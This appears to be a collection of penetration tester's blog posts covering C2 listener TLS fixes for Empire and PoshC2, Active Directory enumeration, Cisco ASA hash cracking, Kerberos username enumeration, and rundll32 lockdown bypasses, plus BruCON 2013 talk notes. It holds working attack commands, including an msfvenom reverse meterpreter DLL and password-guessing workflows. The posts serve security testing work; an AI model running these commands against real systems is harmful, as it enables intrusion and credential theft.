Troubleshooting Empire and PoshC2_Python HTTPS Connections

I’ve experienced a bit of trouble of late with both Empire and PoshC2_Python payloads failing to call back to their corresponding Empire and/or PoshC2 listener/server. This brief post detailing the fixes/workarounds I’ve used may be helpful to someone else.

I understand the issues are a result of the OpenSSL configuration in Kali Linux (The Kali build used here is up-to-date as of December 2018)

Troubleshooting Empire

I’ll discuss Empire first, the following figure details my setup:

Once our Empire listener is up and running we attempt to run our PowerShell launcher on the victim. It fails silently, we receive no indication of why. However, capturing the session with Wireshark does indicate the source of the problem, namely a Protocol Version issue:

Alert (Level: Fatal, Description: Protocol Version)

Performing a quick sslscan reveals our Empire Listener only supports TLS 1.2:

The Fix

It turns out we need to downgrade the TLS protocol support we’re using on our Empire listener. We can tweak this via the following file:


We now need to find the following lines in (from line 1146 onward in my case):

pyversion = sys.version_info

# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
proto = ssl.PROTOCOL_SSLv23

Basically, we need to comment out 8 lines and add a single new line:

#pyversion = sys.version_info

#support any version of tls
#pyversion = sys.version_info
#if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
# proto = ssl.PROTOCOL_TLS
#elif pyversion[0] >= 3:
# proto = ssl.PROTOCOL_TLS
# proto = ssl.PROTOCOL_SSLv23
proto = ssl.PROTOCOL_TLSv1

Once we’ve made the change, we need to restart Empire (assuming its running).

As can be seen below, as a result of the change our listener is now accepting TLS 1.0 connections:

As a result of our tweak, once a payload is run on our target/victim, Agents are successfully checking in once again:

Troubleshooting PoshC2_Python

As our PoshC2_Python server is also running on Kali it effectively suffers from the same issue.

We’ve already discussed the problem, seen the associated packet capture and sslscan data, so we’ll jump straight into the fix.

The fix is actually provided by the main PoshC2 developer @benpturner and is referenced here (but still needs to be made manually):

Essentially we need to comment out 3 lines (lines 311, 312 & 313) in the following file:


Original content:

if (os.path.isfile("%sposh.crt" % ROOTDIR)) and (os.path.isfile("%sposh.key" % ROOTDIR)):
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception as e:
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
# add this if required -
# httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)

Tweaked/commented content:

if (os.path.isfile("%sposh.crt" % ROOTDIR)) and (os.path.isfile("%sposh.key" % ROOTDIR)):
#httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
#except Exception as e:
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
# add this if required -
# httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)

As can be seen below, once the PoshC2 server is restarted we now have TLS 1.0 support:

We’re now able to successfully receive the agent connection from our target victim:

Low Privilege Active Directory Enumeration from a non-Domain Joined Host


You have recovered Domain User credentials for a domain but have  no privileged or interactive access to any targets i.e. no Domain Admin account or any account that is capable of establishing an RDP session.


On a recent engagement I was performing an internal assessment against several untrusted Windows domains. Using Kerberos Domain Username Enumeration and subsequently performing  SMB password guessing it was possible to achieve access to a number of Domain accounts.

However, it transpired that none of the identified credential sets were privileged e.g. they were not Domain Admin and additionally, none of the accounts were members of the “Remote Desktop Users” group. As a result, no interactive access to any of the target hosts was possible.

A number of different techniques exist to query Active Directory using low privileged accounts (i.e. a domain user) from our non-domain joined pentest laptop and I will discuss a few options for doing this in this post.

The ultimate goal of this enumeration is to:

  • Enumerate all Domain accounts
  • Enumerate privileged accounts to target i.e. Domain Admins or members of the Remote Desktop Users group
  • Enumerate the Domain’s password policy
  • Enumerate further avenues of attack

Once this enumeration is complete accounts can be subject to further password guessing attempts.

The domain user credentials used in the following examples are username = ops, password = Pa55word


The first of the tools I will discuss is windapsearch:

As the tool’s author describes: “windapsearch is a Python script to help enumerate users, groups and computers from a Windows domain through LDAP queries”

Using our prerequisite/previously guessed domain user account the following syntax can be used to query the remote domain for all users within the domain:

windapsearch --dc-ip [IP_ADDRESS] -u [DOMAIN]\\USERNAME -p [PASSWORD] -U

The following figure shows the tool enumerating all users in the domain (-U switch):

NOTE: Output has been cleaned up a little with grep & cut

windapsearch --dc-ip -u mydomain\\ops -p Pa55word -U | grep cn: | cut -d " " -f 2

Using the --da switch we can also enumerate Domain Admins:

windapsearch –dc-ip -u mydomain\\ops -p Pa55word --da | grep cn: | cut -d " " -f 2

Using the -m switch we can enumerate members of the “Remote Desktop Users” group:

windapsearch --dc-ip -u mydomain\\ops -p Pa55word -m "Remote Desktop Users" | grep CN=


The excellent PowerView from harmj0y probably offers us the best options for AD enumeration in our Domain User / non-Domain joined context.

PowerView is thoroughly and eloquently discussed in harmj0y’s multiple blog posts (see references), but I’ll just discuss a couple of options that can be useful in our scenario.

Initially, we establish a PowerShell session on our non-domain joined Windows host using runas and /netonly i.e. credentials are specified for remote access only:

runas /netonly /user:mydomain\op powershell (we are subsequently prompted for the password):

Note: I’ve already installed PowerSploit (which provides PowerView) in the following path:


Once we have imported PowerSploit via:

Import-module .\PowerSploit.psd1

We can query the domain for all domain users:

Get-DomainUser -Domain mydomain.test -DomainController | findstr samaccountname

We can also query the domain for a list of Domain Admins:

Get-DomainGroupMember -identity "Domain Admins" -Domain mydomain.test -DomainController | findstr MemberName

Next we query the domain for the members of the “Remote Desktop Users” group:

Get-DomainGroupMember -identity "Remote Desktop Users" -Domain mydomain.test -DomainController | findstr MemberName

We can also query AD for a list of all available shares that our current user context is able to access:

Find-DomainShare -CheckShareAccess -Domain mydomain.test -DomainController

Microsoft Remote Server Administration Tools (RSAT)

Microsoft RSAT is designed to allow administrators to manage Windows Servers from a remote computer. RSAT provides another option for us to enumerate domains from our low privileged, non-connected domain context:

Initially, RSAT proves useful for the enumeration of the remote Window Domain’s password policy. Again, we do this from a runas, /netonly initiated PowerShell session (see PowerView above for details):

Get-ADDefaultDomainPasswordPolicy -Server 192.1685.5.1

We are also able to utilise RSAT from a GUI perspective, again this is initiated via runas:

runas /netonly /user:mydomain\ops mmc

Next we add “Active Directory Users and Computers” via the new mmc console:

Changing the Domain Controller instance to our target:

We are then able to gain a graphical view of the Domain’s user community:

The whole purpose behind this Domain enumeration is to provide us with further and more privileged accounts to target from a password guessing perspective. The retrieval of the Domain’s password policy obviously also complements this exercise.


PowerView Cheat Sheet

Cracking Cisco ASA SHA-512 Hashes with Hashcat

I haven’t seen too much detail around about how to crack Cisco ASA PBKDF2 (Password-Based Key Derivation Function 2) SHA-512 hashes, which I believe have been supported in some ASA versions from as early as March 2016.

As always the hashes can be recovered from the appropriate Cisco ASA config file.

Here are some examples of how the hashes can appear in the ASA config files. In the examples below all 3 sample hashes can be easily cracked using any respectable word-list:

enable password $sha512$5000$vlCP+V07DGEJ9TcSV/GpuA==$2S8SLoECmbtb/o17ZhXuKg== pbkdf2

username admin password $sha512$5000$SvZkzlRDO115YrLXsZuWCg==$Yu0w7sFjhLnbtZQJ/nyp+A== pbkdf2 privilege 15

username admin password $sha512$5000$OZ45Ro7002bnyFGXlIghqg==$T9oP1zKSTmv74Nizd8ku3A== pbkdf2 privilege 15

Some modification of the hashes is required before they can be imported into hashcat. Basically the first $ needs to be removed and all subsequent $’s need to be replaced with colons.

For example:




This hash can now be fed into hashcat as a single:

hashcat64.exe -m 12100 sha512:5000:SvZkzlRDO115YrLXsZuWCg==:Yu0w7sFjhLnbtZQJ/nyp+A== c:\Tools\wordlists\pw_topten.txt

Or via a file:

hashcat64.exe -m 12100 sha512.txt c:\Tools\wordlists\pw_topten.txt

Cracked hashes:

sha512:5000:vlCP+V07DGEJ9TcSV/GpuA==:2S8SLoECmbtb/o17ZhXuKg==: (i.e. blank)


I leave the final hash (below) to be cracked as a challenge for the reader (it can be cracked with any respectable word-list):


Thanks to my colleague Marius for the initial pointer on the hash type.

Kerberos Username Enumeration – Top 500 Common Usernames

Kerberos Username Enumeration – Username Wordlists

I’ve been having a fair bit of joy with the auxiliary/gather/kerberos_enumusers metasploit module on internal engagements, however you do need to provide the module with a good quality username wordlist or wordlists.

On a recent engagement, using only the top 50 male and female userlists, I was able to guess 70 domain accounts from a possible 400, and of course several of them were found to be configured with the obligatory easily guessed password.

Most domains I see tend to leverage some form of firstname, surname combination for domain user usernames. For example:

[Firstname].[surname] e.g: JACK.SMITH

[Firstname, First Letter].[Surname] e.g. J.SMITH

To that end I have created some username lists that are likely to identify valid usernames when targeting large Windows domains. The lists are compiled from the top 500 most common firstname and surname as per the United Kingdom’s Office for National Statistics (ONS).

Initially, you will want to run a tool such as Responder which will help you determine the format for usernames within the target environment e.g. L.FOWLER or LIAM.FOWLER. Indeed, I typically conduct this username enumeration exercise whilst Responder is running in the background.

Once the format has been identified and assuming the format is used universally throughout the domain, Kerberos username enumeration can begin.

The username lists I have created can be seen in the table below. I have also included the raw firstnames and surnames lists should you need to create a custom format:

Username ListWord CountFile SizeExample
Top 500 Female Firstnames5004KAMELIA
Top 500 Male First Names5004KJACK
Top 500 Surnames5004KSMITH
Top 50 Female Firstnames.Surnames25000330KAMELIA.SMITH
Top 50 Male Firstnames.Surnames31000400KJACK.SMITH
A-Z.Surnames13000116KA.SMITH to Z.LEONARD
C.Surnames etc.5005KC.SMITH

Note: All of the username wordlists (A.Surname through to Z.Surname) can be downloaded from:


Attack Walkthrough

I’ll now walk through the complete attack process:

Initially we configure msf module auxiliary/gather/kerberos_enumusers with our wordlist:

We subsequently run the module. We’re obviously going to have a lot of failures but with no account lockout to worry about it doesn’t matter:

Running “creds” displays all of the successfully enumerated usernames:

The final stage is to leverage the auxiliary/scanner/smb/smb_login msf module to determine if any of our identified accounts are configured with weak passwords:

Obviously, the domain’s account lockout policy should be taken into consideration when attempting to guess passwords. A sensible approach is to attempt a single password at a time, restricting yourself to 2 guesses (system set to lockout after 3 invalid attempts) or 4 guesses (system set to lockout after 5 invalid attempts) against a single account every 30-minutes. 30 minutes is a typical “lockout observation window“.

Handily the auxiliary/scanner/smb/smb_login msf module’s “ABORT_ON_LOCKOUT” option will prevent too much damage being done, as long as it is enabled.

Auto-sslscan (Automatic SSL Scanning)


As I mentioned in the previous post whilst Nessus and Nmap do a reasonable job of enumerating SSL protocols and ciphers I often find myself utilising other 3rd party SSL scanning tools. One I find myself turning to on a regular basis is sslscan, I like the output it provides and issues become immediately apparent, although if you prefer using SSL scanning tool X or Y, the auto-sslscan code can be easily amended to cater for your tool of choice.

Auto-sslscan is a python script designed to automate the process of conducting ssl scanning via sslcan. The Auto-sslscan script parses an nmap.xml output file, extracts all SSL services and automatically performs an sslscan of them.

Step 1 – Create a valid nmap .xml file:

Note: Some form of Nmap version scanning must be utilised to create the XML ouput i.e. -sV or -A (In order to determine whether the service is SSL enabled)

Step 2 – Process the Nmap XML file with

SSL Services:

That’s effectively job done, we now have a list of SSL services if we wish to target them again with another tool:

SSL Scan Ouput:

The actual SSL scanning “sslscan” ouput is saved to a concatenated file (truncated image below):

The code and installation instructions can be found here:

Also check out nmap-ssl-parser, which simply parses the nmap XML file and provides a list of SSL services:

Credit  – The base code I used to create nmap-ssl-parser:



Nessus and Nmap both do a decent job of enumerating supported SSL protocols and ciphers from remote servers. However, I usually find myself also utilising other 3rd party SSL scanning tools. To that end I wanted an easy way to quickly parse out SSL services to an output file for input into other tools.

Nmap-ssl-parser is a python script designed to query nmap XML output and provide a list of usable ssl services in the format host:port

The nmap-ssl-parser script parses an nmap.xml output file, extracts all SSL services and writes them to a filename of your choice.

Step 1 – Create a valid nmap .xml file:

Note: Some form of Nmap version scanning must be utilised to create the XML ouput i.e. -sV or -A (In order to determine whether the service is SSL enabled)

Step 2 – Parse the nmap .xml file with

That’s effectively job done, as can be seen below our output file “my_output_file.txt” contains our host:port formatted list ready for importing into any other tool of choice:

The code and installation instructions can be found here:

Also check out auto-sslscan, which takes this process a step further by automating sslscans from the parsed list of SSL services:

Credit  – The base code I used to create nmap-ssl-parser:

Kerberos Domain Username Enumeration

Kerberos Domain Username Enumeration

Over recent years enumerating valid operating system level user names from up-to-date and well-maintained Windows environments, even from an internal test perspective, has become increasingly unlikely. Where RID cycling once provided us with a full list of domain users from an unauthenticated perspective, this is generally no longer the case.

However, in relation to internal assessments the Kerberos service (88/tcp) still provides us with a happy hunting ground in relation to the ability to enumerate domain account names.

Essentially the username enumeration is leveraged via the following Kerberos error codes:

User Status Kerberos Error
Present / Enabled KDC_ERR_PREAUTH_REQUIRED – Additional pre-authentication required
Locked / Disabled KDC_ERR_CLIENT_REVOKED – Clients credentials have been revoked
Does not exist KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database


Several good tools, which have been around for some time, have provided us with the ability to leverage these Kerberos responses to identify valid or invalid domain accounts.

Both of the tools I have been leveraging up until now have both been provided by Patrik Karlsson, the first is the standalone Java tool Krbguess, the second being the krb5-enum-users NSE script for nmap.




Java –jar kerbguess.jar –r [domain] –d [user list] –s [DC IP]



Nmap krb5-enum-users NSE Script


Nmap –p 88 –script-args krb5-enum-users.realm=’[domain]’,userdb=[user list] [DC IP]



Metasploit Module: auxiliary/gather/kerberos_enumusers

Like most penetration testers I’m a heavy user of the Metasploit Framework and for years have thought I would like to be able to leverage this functionality from within the framework. For whatever reason it never seems to have been implemented, thus I decided to have a go at implementing it.

Leaning heavily on the Kerberos support provided by other Metasploit contributors and using the auxiliary module for ms14_068_kerberos_checksum as a template the process was actually a lot simpler than I had anticipated.

The new Metasploit auxiliary module can be found in the following location:



As with the previously discussed Kerberos enumeration tools, 3 values need to be provided:

  1. Domain Name (DOMAIN)
  2. Domain Controller IP (RHOST)
  3. User list (USER_FILE)


The module can now be run to enumerate valid (and disabled/locked) domain accounts via the Kerberos service:


Finally, and thanks to an addition by bwatter-r7 at rapid7, any valid enumerated usernames are stored in the Metasploit database and can be retrieved via the ‘creds’ command:



Babel Scripting Framework (babel-sf)

The Babel Scripting Framework (babel-sf) is a collection of custom scripts to facilitate useful pentest related functions via scripting languages.

All of the following tools are replicated in the following languages – PowerShell, Perl, Ruby and Python:

  1. Portscanner
  2. ARPscanner
  3. FTP Client
  4. WGET Client
  5. Bind Metasploit Payload
  6. Reverse Metasploit Payload

Why a custom scripting framework?

babel-sf has been created for testing minimal installations, locked down and/or hardened environments e.g.

  1. When the target Operating System has a minimal installation
  2. When the Operating System’s native tools have been removed
  3. When the Operating System’s native tools have been locked down via ACLs, Group Policy or AppLocker

But crucially, you still have access to one or more scripting languages e.g. Python

Its development was also partially driven by my own needs:

  1. Proof of Concept i.e. to demonstrate why access to scripting languages can be bad!
  2. System Administrator “Yeah, users have access to [ruby/perl/python/PowerShell], so what?”

But really Why?

To solve reoccurring problems encountered during my testing:

  1. Having to write your own code to perform a required task (takes time!)
  2. Having to Google for code to (re)use, tweak and/or just to get working (takes time!)

I expect  babel-sf to be used when you don’t have any tools or Operating System utilities available e.g.

  1. No telnet
  2. No FTP
  3. No wget
  4. No SSH
  5. No netcat, nmap etc. etc.

In this scenario you simply download babel-sf  onto the target box via a short one liner (in whichever scripting language is available to you).


babel-sf “aspires” to be identical in each scripting language:

  1. Identical Usage (switches etc.)
  2. Identical Output
  3. Offer an identical ‘Look and Feel’


As it stands, babel-sf provides scripts for the following functions:

1. Portscanner (see examples below)

2. Arpscanner (see examples below):

So you get the idea, replicated tools in multiple scripting languages…From now on I’ll just show one example screenshot per utility (but they are all there!)

3. FTP client (crude)
ruby (example):

4. WGET client
perl (example):

5. HTTP Server
PowerShell (example):

6. Bind Metasploit Payload
python (example):

7. Reverse Metasploit Payload
ruby (example):

Initial Download?

Assuming that at least one scripting language is supported on the target system, an initial single line script (which provides wget type functionality) will be run to download babel-sf to the target host.

In practice to download babel-sf to our target system we run the relevant script, for our available programming language.  This will have to be typed in manually (but thankfully these scripts short and succinct).


Create ‘’ containing the following code and execute via: ‘perl’

use LWP::Simple; mirror('', '');


Create ‘’ containing the following code and execture via: ‘python’

import urllib; urllib.urlretrieve('', '')


Create ‘download.rb’ containing the following code and execture via: ‘ruby download.rb’

require 'open-uri';"", "wb").write(open("", "rb").read)


Create ‘download.ps1’ containing the following code and execture via: ‘powershell .\download.ps1’

(new-object System.Net.WebClient).Downloadfile("","")

Obviously, if you were located on a closed network you would download from your own host, rather than from github.

Script Uniformity?

The scripts offer uniform functionality to a point, some exceptions are:

Ruby has a socket limit (approx 1024):  This limits the maximum number of ports that can be scanned at once

I had to be flexible with the type of metasploit shells included:  Whilst, bind and reverse shells are included for each scripting language, one language may provide tcp_shells whlilst another may provide meterpreter shells

Whilst the underlying functionality is similar for all of the different HTTP servers: It proved tricky getting HTTP servers to provide a uniform look/feel:

Arpscanner usage varies a little between languages: The interface switch (e.g. eth0) is not currently supported in all languages


  1. I’m not a coder (if you are a coder, look away now!)
  2. Coding in 4 different languages at the same time is foolhardy!
  3. Bugs / Errors abound
  4. If you don’t like certain aspects, contribute! Make them better!


  1. Only limited testing has been conducted
  2. Further testing, testing, testing is required e.g. What versions of Perl, Python, Ruby and PowerShell do the scripts run on?

babel-sf has been tested on the following target Operating Systems:

Perl, Python and Ruby (Currently only targeting Nix systems)

  1. Ubuntu 12.04
  2. Debian “wheezy”

PowerShell (Windows)

  1. Created on and tested in PowerShell version 2.0 (Windows 7)

Future Additions?

Addition of further scripting languages:

  1. PHP
  2. VBScript
  3. Java
  4. More?

Github –
Blog –

Babel-sf is not wholly new code by any means; large snipets, small snipets and great ideas have been borrowed from many other open source repositories (hopefully, I’ve remembered to reference them all!):

Coding for penetration testers (Syngress Press)

rundll32 lockdown testing goodness

I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively with the vast majority of file and folder, service and AppLocker applied rules and permissions preventing the majority of malicious actions.

However, I found that I was able to utilise rundll32.exe to attempt to enumerate/manipulate the environment.  I couldn’t really find a good pentest related resource for leveraging rundll32 so thought I’d a put something together to highlight what I’d found to be useful.

All of the following commands have been tested on Windows 7 Ultimate, buts it’s worth bearing in mind that even if the command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating the command / function that you may not have had before).

I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\Windows\System32 (and most weren’t executable during my engagement).

Note: The usage screenshots have been run from the command line for the sake of clarity, in reality you’re unlikely to have cmd.exe (or PowerShell) access and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).

Main Commands:
rundll32 Shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives
rundll32.exe shell32.dll,Control_RunDLL – Control Panel
rundll32.exe devmgr.dll DeviceManager_Execute – Device Manager (view only)
rundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options
rundll32.exe shell32.dll,Options_RunDLL 2 – Search Options
rundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options
rundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on/off
rundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on/off
rundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options
rundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options (see below)

rundll32.exe keymgr.dll, KRShowKeyMgr – Stored Usernames/Passwords (see below)

rundll32 Shell32.dll,OpenAs_RunDLL – Change file associations (e.g. ext .abc)

rundll32.exe van.dll,RunVAN – Network Popup (Subsequently access networking?)
rundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location (wizard)
rundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre
rundll32.exe dsquery,OpenQueryWindow – Find Users (New targets to brute force?)

More Intrusive Commands:
rundll32.exe powrprof.dll,SetSuspendState – Hibernate
RunDll32.exe user32.dll,LockWorkStation – Lock Screen

Utilise a Third Party .DLL?

Didier Steven’s has produced a nice write up on taking a third party command interpreter and converting it from .exe to .dll, for more information see: Didier’s Blog

If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe, the steps to do this are as follows:

1. Upload Didier Steven’s cmd.dll to your target system.
2. Create a new shortcut (on your desktop for example):
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\cmd.dll,Control_RunDLL
3. Double click your new shortcut to pop your command shell

Metasploit Reverse Shell?

Another option to abuse rundll32 maybe to upload a Metasploit derived .dll, the steps to do this are as follows:

1. Create our reverse_shell .dll file:
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=12345 > ./pentest.dll

2. Upload the reverse_shell payload .dll file to our target system e.g. HTTP

3. Start our reverse listener on our pentest host via Metasploit’s: /exploit/multi/handler

4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut:
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\pentest.dll,Control_RunDLL
We now have a full meterpreter session in the context of our standard user, but we’re now able to initiate privilege escalation etc. via the Metasploit framework 🙂

By way of further reading; JavaScript can also be called through rundll32.exe, checkout the following post:


BruCON 2013 – Highlights

The fifth BruCON conference was held 26th to 27th of September 2013 in Ghent, Belgium.  From the off, the conference had a great feel, its organised by a group of security enthusiasts as a non-profit organisation and they do a great job.  From the live classical piano playing in the lounge/rest area where you have you  meals; breakfast, lunch and dinner (which are all included in the low price) to the large screen displaying all the recent #BruCON twitter activity it makes for an enjoyable couple of days.  The conference was organised into a single (main auditorium) speaker track and 2 hands-on lab tracks in the afternoon.  Whilst you’re wholly free to mix and match between the main track and the lab tracks, I focused on the main speaker track (although I did hear that the labs were also excellent!), my vague recollections and highlights can be found below.

HTTP Time bandit – Vaagn Toukharian

The tool is basically a tool to perform resource usage denial of service (DOS) type attacks against layer 7 or as referred to during the talk “HTTP GET flooding with spice”. In essence the tool performs a GET flood but some analysis is done before flooding takes place.

The tool first conducts a spider of the site to determine and collect the transfer times for each resource, the average speed of transfers are calculated. Once complete the resource(s) That have the slowest average transfer time(s) are calculated; effectively CPU intensive resources take longer to respond and this is what we are identifying here. To remove false positives from the returned data set statistics are used to analyse the data and discard resources that have a large degree of variance i.e. non consistent time delays that have another cause e.g. network latency.

The tool is available on the GitHub link:

The speakers moved on to discuss traditional DDOS defences in the form of load balancing and commercial protection services e.g. cloud based solutions, identifying and fixing resource hogs, apache configuration options and other apache modules advanced mod_security protection

The speakers suggested that Timebandit can be used itself to identify and fix these resource hogs. And went on to state that in an ideal world the tool itself would generate configuration files to protect the system (stating this was unlikely to happen).

The following Apache modification options were discussed:

  1. mod_security – offers simple protections that reduced an unprotected attack (i.e. without the change) with a CPU threshold of 98% down to a CPU load of 0% (with the change applied)
  2. mod_limitpconn – limits the number of downloads
  3. mod_qos – provides resource management options
  4. mod_bwshare – accepts or rejects connections based on previous transactions with a source IP address
  5. mod_evasive – DOS/DDOS protection measures
  6. mod_httpbl – Makes use of project honeypot to gather a list of violators for the blacklist (it was suggested this was good in theory but hadn’t been examined in detail)

Taking the BDSM out of PCI with Open Source – Erin Jacobs and Zack Fasel

As most people who deal with it are only too painfully aware PCI DSS represents the Payment Card Industries, Data Security Standard.

  • PCI compliance comprises of levels 1-4.
  • Companies attempt to outsource the problem
  • Open Source Solutions can be used for everything except external vulnerability scans.
  • No clear PCI configuration guidelines, very generalised

The speakers have started the “Open PCI”. With the aim to provide open source guidelines which are scalable, contain specific walk throughs and simple deployments via ready-to-go installations / virtual machines.

Although there are 12 PCI issues, the talk was only concerned about those that people are getting wrong, these issues in priority were:

  • Logging: either not doing it well or spending too much money on it. Splunk whilst an excellent resource is too expensive. How about an open source option?

Linux = traditional options have been: syslog or deploying an agent.
Windows = Deploying an agent (most likely option) or integration with HIDS.

  • Log server storage options were discussed “fluentd” was posed as a possible open source option to Splunk.
  • File Integrity Monitoring: several options were discussed with the best suggested being OSSEC.
  • Patch Management: it was stated that this probably the hardest thing to address with open source, but chef / puppet were suggested by a member of the audience as possible options.
  • 2 factor authentication: OAUTH a hardware and software solution.
  • AV – anomaly or ClamAV based or potentially binary white-listing.

CobraDroid – Jake Valletta

CobraDroid is a full-featured Android sandbox that includes the ability to modify device and radio identifiers, proxy network traffic with SSL validation bypassing, and perform per application method hooking, alerting, and packet capturing (and more!).

AppUse was discussed a closed source dynamic analysis tool.

CobraDroid setup:
Setup Android SDK, Download archives from his site, create new AVD (may have missed a stage here, see slides for full details).

CobraDroid runs Android 2.3, provides both Bash and Busybox which offers a much more user friendly testing environment.

CobraDroid Functionality:

The tools SSL validation bypass allows you to man in the middle SSL connections!

Application specific packet capture, uses custom iptables rules, resultant pcap files can be viewed wire shark.

Uses method hooking to alert on method calls – configured via the file /etc/hooks.conf

Project website:

Real Time Analysis and Visualisation of Internet Status – Tiago Balgan Henriques, Tiago Martins, Joao Gouveia

Events are processed and analysed, as they happen, without storing large data volumes, enabling live actionable intelligence and rapid response capabilities for threat analysts and decision makers who want to stay ahead of emerging threats and opportunities or in other words “events, lots and lots of events”.

The huge amount and variety of data to tackle is difficult, a common API?

The speaker team have created a high performance scalable Complex Event Processor (CEP), uses streaming technology, follows publisher/subscriber model. Events are all handled in JSON format.

“StreamForce” = CEP
Search forms are entered and used to query the API
Real time feed services from multiple sources i.e. Honeypots, DNS, mail protection products.

Once the form is submitted It is possible to display a geographic maps showing botnet activity, Zeus activity etc. For example it would be possible to show the biggest botnets in any specific country.

Lightening Talks – Day 1

OWASP JAWS – Purpose: The purpose of the project is to have a workset with runnable java code that shows secure coding practices in a working way. Too many times developers end up at some developer forum where someone asks a question and the solutions (that may be working but not necessarily in a secure way) are copied and end up in production code:

DNS Amplification Attacks – Lucas Kauffman some very good slides that should be read in their entirety:

The curious case of – Speaker was trying to determine why one host was always resolving to a non Google related IP address in China i.e. It turned out that DNS responses were being resolved to IPV6 addresses but interpreted as IPV4 addresses by affected hosts i.e. decoded and always resolving to i.e this address hosted in China.

HTTP2.0 (Speedy) – Google’s implementation accepted as the new standard – makes use of header compression both client and server side. Not pull and request as old implementations but multiple simultaneous conversations – Burp doesn’t work with it! It’s all SSL, Web over UDP as well as TCP.

Day 2

Paint by numbers vs Monet – Russ Gideon

Analysis of APT attacks has shown that an MSF module has been seen in APT attacks 7 of 22 in the CVE PDF exploit discussed, the only change from the default MSF module was that the shellcode changed and obfuscation was added but it was the same basic code in use on the whole.

Once access has been gained: long term back doors established, credential harvesting, lateral movement, mimikatz (can be their own version), PTH toolkit, their own psexec.exe. Dropper installs a service. Remote named pipes for all communications.

The speakers have created a custom psexec module (on GitHub), to hide from forensics, AV etc.

Discussed a black hat group: installed 3 x back doors on each host, used UPX for packing (i.e. old/lame) and self extracting RAR file, they attacked sticky keys (sethc) and magnify for privilege escalation. SYSTEM$ user added and the user was also added to the local admins group, password identified was “qazwsx!#123”

In conclusion they summarised that APT attacks were not highly sophisticated, the groups behind the attacks do not think like pentesters, they think forensically and opportunistically.
Conclusion: pentesters usually have a much different footprint and end goals than those of APT operators / Nation States.

Data Plane Networking – Robert Graham

Apache/Bind should not be exposed to the Internet they were designed for the Internet that existed in the late 90’s and are not robust/ruggedised enough for today’s Internet (I paraphrase here). The speaker suggested using an exokernel i.e every event has its own thread and a virtual network adapter. A more short term solution is to make use of Nginx (as opposed to Apache) and other DNS servers (as opposed to Bind) faster.

Building Custom Android Malware for Pen Testing – Stephan Chenette

Android uses the Dalvik Virtual Machine. Malware defined as anything that breaks the security model without the users knowledge.

Once installed malware will probe for emulator or physical device (won’t trigger if emulator is detected as an end user would not be running an emulator), what type of network connection: wifi,3G etc.

Malware actions i.e. what are they trying to achieve: to make use of premium services that the user is charged for (not until their next bill) or advertising i.e. the client is used as an SMS bot sending texts to a wider user community.

One infection discussed was simply installing a valid application (no Trojan), but the app contains a vulnerability that is exploited only when the victim connects to attackers website.

The majority of malware today is found on 3rd party stores, although some is also found on the Google store.

Summary: Apps can do almost anything; the speaker suggests the fix is not restricting this functionality but in comprehensively reviewing applications’ behaviour and ensuring they conform to their specified security model.

Geolocation of GSM devices – David Perez and Jose Pico

This talk focused on the Geolocaton of GSM (I.e. 2G devices) when there is no access to the phone network. The only thing known about the handset was the IMEI (i.e. the unique device) and IMSI (i.e the unique SIM) and rough location of the device. The scope was to produce a car based/portable solution.

The equipment utilised by the team was a portable fake GSM Base station (USRP1), Omni-directional and directional antennas (to pinpoint the exact location), Software the team used was in the form of Open Base Transceiver Station (OpenBST). All of the equipment needed to provide GPS data, triangulation and a user console.

Initially the team focused on distance estimation based on power measurements, this method failed and was soon discarded.

Time based triangulation could only locate devices plus or minus 500 meters, this was initially deemed to be a fail as it was not accurate enough (the inaccuracy was due to a delay introduced that was dependant on phone make/model/vendor).

This testing is illegal in most countries, however the team stated all testing was conducted in a country where it was legal….

The team did find a solution to the device introduced delays, but whilst results were much better after this problem had been solved, results were still not good enough.

The next issue was that when the team were impersonating the real network, no devices would register with the fake cell (phones didn’t see it), if tests were repeated with commercial BTS they did register why?

Power related issue? No
Beacons wrong? No, they were different between the fake and real cells initially but even after this had been fixed the issue still existed.

